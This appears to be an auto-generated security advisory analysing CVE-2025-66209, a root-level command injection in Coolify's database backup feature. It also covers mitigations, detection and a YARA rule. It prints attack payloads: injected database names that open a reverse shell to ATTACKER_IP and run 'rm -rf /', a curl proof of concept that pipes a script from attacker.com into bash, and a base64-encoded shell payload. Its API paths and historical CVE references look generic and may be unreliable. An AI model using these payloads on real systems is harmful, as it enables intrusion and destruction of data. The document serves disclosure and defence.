CVE-2025-66209
CVE-2025-66209
Weakness (CWE)
CVSS Vector
v3.1- Attack Vector
- Network
- Attack Complexity
- Low
- Privileges Required
- Low
- User Interaction
- None
- Scope
- Changed
- Confidentiality
- High
- Integrity
- High
- Availability
- High
Description
Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. Prior to version 4.0.0-beta.451, an authenticated command injection vulnerability in the Database Backup functionality allows users with application/service management permissions to execute arbitrary commands as root on managed servers. Database names used in backup operations are passed directly to shell commands without sanitization, enabling full remote code execution. Version 4.0.0-beta.451 fixes the issue.
Comprehensive Technical Analysis of CVE-2025-66209
Vulnerability ID: CVE-2025-66209 CVSS Score: 9.9 (Critical) Affected Software: Coolify (prior to v4.0.0-beta.451) Vulnerability Type: Authenticated Command Injection (Remote Code Execution - RCE)
1. Vulnerability Assessment & Severity Evaluation
Vulnerability Overview
CVE-2025-66209 is an authenticated command injection vulnerability in Coolify, an open-source self-hosted infrastructure management tool. The flaw resides in the Database Backup functionality, where user-controlled input (database names) is passed unsanitized into shell commands, allowing arbitrary command execution with root privileges on managed servers.
Severity Justification (CVSS 9.9 - Critical)
The CVSS v3.1 scoring breakdown is as follows:
| Metric | Value | Justification |
|---|---|---|
| Attack Vector (AV) | Network | Exploitable remotely via web interface. |
| Attack Complexity (AC) | Low | No specialized conditions required. |
| Privileges Required (PR) | Low | Requires authenticated access with application/service management permissions. |
| User Interaction (UI) | None | No user interaction needed. |
| Scope (S) | Changed | Impact extends beyond the vulnerable component (affects underlying host). |
| Confidentiality (C) | High | Full system compromise possible. |
| Integrity (I) | High | Arbitrary command execution allows data tampering. |
| Availability (A) | High | Attacker can disrupt services or delete data. |
Key Factors Contributing to Critical Severity:
- Root-level RCE – Commands execute with the highest privileges.
- Low Attack Complexity – Exploitation requires only basic scripting knowledge.
- Network-Exploitable – Can be triggered remotely via the web interface.
- High Impact – Full system compromise, lateral movement, and persistence possible.
2. Potential Attack Vectors & Exploitation Methods
Exploitation Prerequisites
- Authenticated Access – Attacker must have a valid account with application/service management permissions (e.g., a developer or admin role).
- Database Backup Functionality – The vulnerability is triggered when initiating a backup operation with a maliciously crafted database name.
Exploitation Steps
-
Identify Target Database
- The attacker lists available databases in Coolify’s interface.
- Alternatively, they may create a new database with a malicious name.
-
Craft Malicious Database Name
- The database name is injected with shell metacharacters (e.g.,
;,|,&&,`,$()) to break out of the intended command. - Example payload:
legit_db_name; id > /tmp/pwned; echo "exploited" #- This would execute
id > /tmp/pwnedand append "exploited" to the backup log.
- This would execute
- The database name is injected with shell metacharacters (e.g.,
-
Trigger Backup Operation
- The attacker initiates a backup via the Coolify UI or API.
- The unsanitized database name is passed to a shell command (e.g.,
mysqldump,pg_dump), leading to arbitrary command execution.
-
Post-Exploitation
- Reverse Shell: Attacker could spawn a reverse shell:
legit_db_name; bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' # - Data Exfiltration: Steal sensitive files (
/etc/passwd, SSH keys, database credentials). - Persistence: Install backdoors (e.g., cron jobs, SSH keys, malicious services).
- Lateral Movement: Pivot to other systems in the network.
- Reverse Shell: Attacker could spawn a reverse shell:
Proof-of-Concept (PoC) Exploit
A simplified PoC (for educational purposes only):
# Step 1: Create a database with a malicious name
curl -X POST "https://coolify-instance/api/databases" \
-H "Authorization: Bearer <VALID_TOKEN>" \
-H "Content-Type: application/json" \
-d '{"name": "legit_db; curl http://attacker.com/shell.sh | bash #", "type": "mysql"}'
# Step 2: Trigger backup
curl -X POST "https://coolify-instance/api/databases/backup" \
-H "Authorization: Bearer <VALID_TOKEN>" \
-H "Content-Type: application/json" \
-d '{"database_id": "<MALICIOUS_DB_ID>"}'
Result: The curl command fetches and executes a malicious script from the attacker’s server.
3. Affected Systems & Software Versions
Vulnerable Versions
- Coolify versions prior to
4.0.0-beta.451(all releases before the fix). - Self-hosted instances are at risk; cloud-managed versions may also be affected if not updated.
Affected Components
- Database Backup Module – Specifically, the code responsible for generating and executing backup commands (e.g.,
mysqldump,pg_dump). - Shell Command Execution – Any function that passes user-controlled input to
exec(),system(), or similar functions without proper sanitization.
Unaffected Versions
- Coolify
4.0.0-beta.451and later – Patched to sanitize database names before command execution.
4. Recommended Mitigation Strategies
Immediate Actions
-
Upgrade to the Latest Version
- Apply Coolify v4.0.0-beta.451 or later immediately.
- Patch URL: https://github.com/coollabsio/coolify/releases/tag/v4.0.0-beta.451
-
Temporary Workarounds (If Upgrade Not Possible)
- Disable Database Backup Functionality – Remove or restrict access to the backup feature.
- Input Validation & Sanitization – Manually patch the code to escape shell metacharacters (e.g., using
escapeshellarg()in PHP orshlex.quote()in Python). - Least Privilege Principle – Ensure Coolify runs under a non-root user with minimal permissions.
- Network Segmentation – Isolate Coolify instances from critical internal systems.
-
Monitor for Exploitation Attempts
- Log Analysis – Check for unusual database names containing shell metacharacters (
;,|,&&, etc.). - Intrusion Detection – Deploy WAF rules (e.g., ModSecurity) to block suspicious backup requests.
- File Integrity Monitoring (FIM) – Detect unauthorized changes to system files.
- Log Analysis – Check for unusual database names containing shell metacharacters (
Long-Term Security Recommendations
-
Code Review & Secure Development Practices
- Input Sanitization – Always sanitize user input before passing it to shell commands.
- Use Parameterized Commands – Avoid string concatenation in shell commands (e.g., use
subprocess.run()withshell=Falsein Python). - Static & Dynamic Analysis – Integrate SAST/DAST tools (e.g., SonarQube, OWASP ZAP) into CI/CD pipelines.
-
Access Control & Authentication
- Role-Based Access Control (RBAC) – Restrict database backup permissions to trusted admins only.
- Multi-Factor Authentication (MFA) – Enforce MFA for all Coolify accounts.
- Session Management – Implement short-lived sessions and rate limiting.
-
Infrastructure Hardening
- Containerization – Run Coolify in a Docker container with read-only filesystems where possible.
- Seccomp & AppArmor – Apply security profiles to restrict process capabilities.
- Regular Audits – Conduct penetration testing and vulnerability scans.
5. Impact on the Cybersecurity Landscape
Broader Implications
-
Supply Chain Risks
- Coolify is used by DevOps teams to manage cloud infrastructure, making it a high-value target for attackers.
- Compromise could lead to lateral movement into CI/CD pipelines, Kubernetes clusters, or cloud environments.
-
Increased Attack Surface for Self-Hosted Tools
- The rise of self-hosted alternatives (e.g., Coolify, CapRover, Portainer) introduces new risks if not properly secured.
- Many organizations lack the expertise to harden these tools effectively.
-
Exploitation in the Wild
- Given the low complexity of exploitation, this vulnerability is likely to be weaponized quickly by:
- APT Groups (for espionage or ransomware deployment).
- Cryptojacking Campaigns (mining malware).
- Initial Access Brokers (IABs) (selling access to compromised systems).
- Given the low complexity of exploitation, this vulnerability is likely to be weaponized quickly by:
-
Regulatory & Compliance Risks
- Organizations using Coolify may face compliance violations (e.g., GDPR, HIPAA, PCI-DSS) if exploited.
- Incident Response Costs – Breaches could lead to costly investigations and legal repercussions.
Historical Context
- Similar vulnerabilities have been observed in other infrastructure-as-code (IaC) tools (e.g., CVE-2021-41079 in Portainer, CVE-2020-15157 in Docker).
- Command injection flaws remain a top OWASP risk (A03:2021 – Injection).
6. Technical Details for Security Professionals
Root Cause Analysis
The vulnerability stems from improper input sanitization in Coolify’s backup functionality. Specifically:
- Database names are passed directly to shell commands without escaping special characters.
- Example vulnerable code (pseudo-code):
# Vulnerable command construction backup_command="mysqldump -u $DB_USER -p$DB_PASS $DB_NAME > /backups/$DB_NAME.sql" system($backup_command)- If
$DB_NAMEcontains; rm -rf /, the command becomes:mysqldump -u user -ppass legit_db; rm -rf / > /backups/legit_db.sql
- If
Patch Analysis
The fix in v4.0.0-beta.451 introduces:
- Input Sanitization – Database names are now escaped using
escapeshellarg()(or equivalent). - Parameterized Commands – Commands are constructed using safe argument passing (e.g.,
exec()with an array of arguments). - Additional Validation – Database names are checked against a whitelist of allowed characters.
Detection & Forensics
-
Log Indicators of Compromise (IoCs)
- Unusual database names in backup logs (e.g., containing
;,|,&&). - Unexpected processes running as
root(e.g.,bash,nc,curl). - Suspicious outbound connections from the Coolify server.
- Unusual database names in backup logs (e.g., containing
-
Forensic Artifacts
- Shell History (
/root/.bash_history,/home/*/.bash_history). - Cron Jobs (
/etc/crontab,/var/spool/cron/). - Network Connections (
netstat -tulnp,ss -tulnp). - File Integrity Changes (
rpm -Va,debsums,AIDE).
- Shell History (
-
YARA Rule for Exploitation Detection
rule Coolify_CVE_2025_66209_Exploit { meta: description = "Detects potential CVE-2025-66209 exploitation in Coolify logs" author = "Cybersecurity Analyst" reference = "CVE-2025-66209" date = "2025-12-24" strings: $db_name_suspicious = /(;|\||&&|`|\$\().*(\/bin\/bash|\/bin\/sh|nc|curl|wget|python|perl)/ nocase $backup_log = /backup.*(failed|error|executed).*[;|&|`]/ nocase condition: $db_name_suspicious or $backup_log }
Exploit Development Considerations
- Bypassing Sanitization – If input filtering is weak, attackers may use:
- Unicode encoding (e.g.,
%3Bfor;). - Command substitution (e.g.,
`id`). - Base64-encoded payloads (e.g.,
echo "YmFzaCAtaSA+JiAvZGV2L3RjcC9BVEFDS0VSLUlQLzQ0NDQgMD4mMQ==" | base64 -d | bash).
- Unicode encoding (e.g.,
- Chaining with Other Vulnerabilities – If Coolify has other flaws (e.g., SSRF, IDOR), an attacker could escalate privileges further.
Conclusion
CVE-2025-66209 represents a critical risk to organizations using Coolify, enabling full system compromise with minimal effort. Given the low attack complexity and high impact, immediate patching is mandatory. Security teams should:
- Upgrade to v4.0.0-beta.451 without delay.
- Audit logs for signs of exploitation.
- Harden Coolify deployments using least privilege and network segmentation.
- Monitor for post-exploitation activity (e.g., reverse shells, data exfiltration).
This vulnerability underscores the importance of secure coding practices and proactive vulnerability management in self-hosted infrastructure tools. Organizations should treat this as a high-priority incident and respond accordingly.